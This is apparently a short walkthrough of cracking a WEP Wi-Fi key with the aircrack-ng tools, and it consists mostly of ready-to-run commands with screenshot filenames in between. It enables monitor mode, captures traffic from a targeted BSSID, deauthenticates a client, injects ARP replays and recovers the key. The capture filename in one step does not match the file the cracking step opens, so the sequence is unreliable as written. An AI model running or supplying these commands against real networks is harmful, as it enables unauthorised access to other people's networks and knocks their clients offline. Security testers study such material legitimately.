The initial phase requires enabling monitor mode on the designated wireless interface.

airmon-ng start wlan1

Next, we map the local radio frequency space to locate the targeted WEP network:

airodump-ng --band abg wlan1mon

6268fa92809fc6d7a3884ec73674490b.png
Once identified, we focus our capture interface on the target network parameters:

airodump-ng --bssid 84:16:F9:9C:9E:40 --channel 6 --write contraseca wlan1mon

We monitor the captured wireless traffic volume. If active traffic is sufficient, we can proceed directly to cryptographic cracking. Otherwise, we must perform packet injection techniques via aireplay-ng to accelerate Initialization Vector (IV) generation.
c023c8d8066ca7212df40afd90d9a993.png
First, we execute a deauthentication attack sequence to force reconnection frames:

aireplay-ng -0 5 -a 84:16:F9:9C:9E:40 -c <MY_MAC> wlan1mon

Next, we initiate ARP request replay injection to maximize packet collection speeds:

aireplay-ng -3 -b 84:16:F9:9C:9E:40 -h <MY_MAC> wlan1mon

ac4d4bd21e9615a2cbc926c3dfe451be.png
While maintaining these background injection processes, we launch the cracking utility in a parallel terminal window:

aircrack-ng -b 84:16:F9:9C:9E:40 captura_wep-01.cap

The parsing engine attempts key derivation once a threshold of IVs is reached; however, the statistical attack will fail if the captured sample size remains insufficient.
667dd53f347ad6549a1087869ec0094e.png
We maintain the collection loop until an adequate pool of initialization vectors is compiled (approximately 100,000 packets). Once met, the statistical matrix resolves, revealing the cleartext network key.
4ab4d6a812c68a9fbab8aa5b284e6806.png